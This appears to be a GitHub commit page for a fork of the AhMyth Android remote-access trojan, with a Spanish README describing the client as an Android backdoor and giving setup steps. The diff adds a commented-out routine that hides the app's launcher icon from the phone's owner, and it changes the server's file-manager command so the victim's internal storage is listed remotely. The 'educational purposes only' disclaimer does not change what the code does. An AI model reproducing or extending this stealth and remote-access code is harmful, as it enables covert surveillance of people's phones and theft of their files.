Skip to content

Commit 4bca4b9

Browse files
committed
Soluciones: list dir, names, hide app
1 parent 563488a commit 4bca4b9

File tree

6 files changed

+97
-10
lines changed

6 files changed

+97
-10
lines changed

AhMyth-Client/.project

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<projectDescription>
3+
<name>AhMyth-Client</name>
4+
<comment>Project AhMyth-Client created by Buildship.</comment>
5+
<projects>
6+
</projects>
7+
<buildSpec>
8+
<buildCommand>
9+
<name>org.eclipse.buildship.core.gradleprojectbuilder</name>
10+
<arguments>
11+
</arguments>
12+
</buildCommand>
13+
</buildSpec>
14+
<natures>
15+
<nature>org.eclipse.buildship.core.gradleprojectnature</nature>
16+
</natures>
17+
</projectDescription>
Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
connection.project.dir=
2+
eclipse.preferences.version=1

AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/MainActivity.java

Lines changed: 8 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -13,19 +13,20 @@
1313

1414
public class MainActivity extends Activity {
1515

16-
17-
1816
@Override
1917
protected void onCreate(Bundle savedInstanceState) {
2018
super.onCreate(savedInstanceState);
2119
setContentView(R.layout.activity_main);
2220
startService(new Intent(this, MainService.class));
2321
finish();
22+
// fn_hideicon();
2423
}
24+
/* En caso de que se quiera ocultar la app
25+
private void fn_hideicon() {
2526
26-
27-
28-
29-
30-
27+
getPackageManager().setComponentEnabledSetting(getComponentName(),
28+
PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
29+
PackageManager.DONT_KILL_APP);
30+
}
31+
*/
3132
}

AhMyth-Server/app/app/assets/js/controllers/LabCtrl.js

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -201,7 +201,8 @@ app.controller("FmCtrl", function($scope, $rootScope) {
201201

202202
// send request to victim to bring files
203203
$rootScope.Log('Get files list');
204-
socket.emit(ORDER, { order: fileManager, extra: 'ls', path: '/' });
204+
// socket.emit(ORDER, { order: fileManager, extra: 'ls', path: '/' });
205+
socket.emit(ORDER, { order: fileManager, extra: 'ls', path: '/storage/emulated/0/' });
205206

206207
socket.on(fileManager, (data) => {
207208
if (data.file == true) { // response with file's binary

AhMyth-Server/app/app/views/build.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@
1111
<td>
1212
<div class="ui labeled fluid input ">
1313
<div class="ui black label">
14-
Source IP
14+
Server IP
1515
</div>
1616
<input ng-model="srcIP" type="text" placeholder="188.132.xxx.xxx">
1717
</div>
@@ -20,7 +20,7 @@
2020
<td>
2121
<div class="ui labeled fluid input ">
2222
<div class="ui black label">
23-
Source Port
23+
Server Port
2424
</div>
2525
<input ng-model="srcPort" type="number" min="1025" max="65535" placeholder="default is 42474">
2626
</div>

README_ES.md

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
# AhMyth Android Rat
2+
###### Beta Version
3+
+ Repositorio original
4+
+ ```https://github.com/AhMyth/AhMyth-Android-RAT.git```
5+
+ El repositorio actual corrige problemas comunes para su instalación en debian 10, también recopila pull requests aún no aprobado e incorpora nuevas funcionalidades.
6+
+ ```https://github.com/elcaza/AhMyth-Android-RAT```
7+
8+
9+
Este proyecto consiste de dos partes
10+
* Servidor : Aplicación de escritorio basada en electron framework (control panel)
11+
* Cliente : Aplicación de android (backdoor)
12+
13+
14+
## Primeros pasos
15+
### Hay dos opciones para instalar la aplicación
16+
#### 1) Desde el código fuente
17+
###### Prerrequisitos :
18+
* Electron (to start the app)
19+
* Java 8 (to generate apk backdoor)
20+
* Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
21+
1. ```git clone https://github.com/AhMyth/AhMyth-Android-RAT.git```
22+
2. ```cd AhMyth-Android-RAT/AhMyth-Server```
23+
3. ```npm start```
24+
25+
#### 2) Desde los binarios
26+
###### Prerequisite :
27+
* Descargar el binario desde https://github.com/AhMyth/AhMyth-Android-RAT/releases
28+
* Java (to generate apk backdoor)
29+
30+
## Instalación de dependencias y solución a errores comunes
31+
+ Esto fue probado en el siguiente ambiente
32+
+ Debian 10
33+
+ javac 8
34+
35+
36+
37+
38+
## Screenshots
39+
<p align="center">
40+
<img src="http://i.imgur.com/HM3uXL6.png" width="600"/>
41+
</p>
42+
43+
---------------------------------------------------------------
44+
45+
<p align="center">
46+
<img src="http://i.imgur.com/nHTGGHi.png" width="600"/>
47+
</p>
48+
49+
---------------------------------------------------------------
50+
51+
<p align="center">
52+
<img src="http://i.imgur.com/XVXCHV9.png" width="600"/>
53+
</p>
54+
55+
56+
## Video Tutorial
57+
<p align="center">
58+
<a href="https://www.youtube.com/watch?v=DDIZTABABzs">
59+
<img src="https://img.youtube.com/vi/DDIZTABABzs/0.jpg" width="600"/>
60+
</a></p>
61+
62+
63+
---------------------------------------------------------------
64+
##### I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.
65+
###### Twitter : <a href="https://twitter.com/AhMythDev"> @AhMythDev </a>
66+
###### Bitcoin address for donations: : 1EVwLuwmbsEuej7qJnNquFeQJLsgd2b8Lq

0 commit comments

Comments
 (0)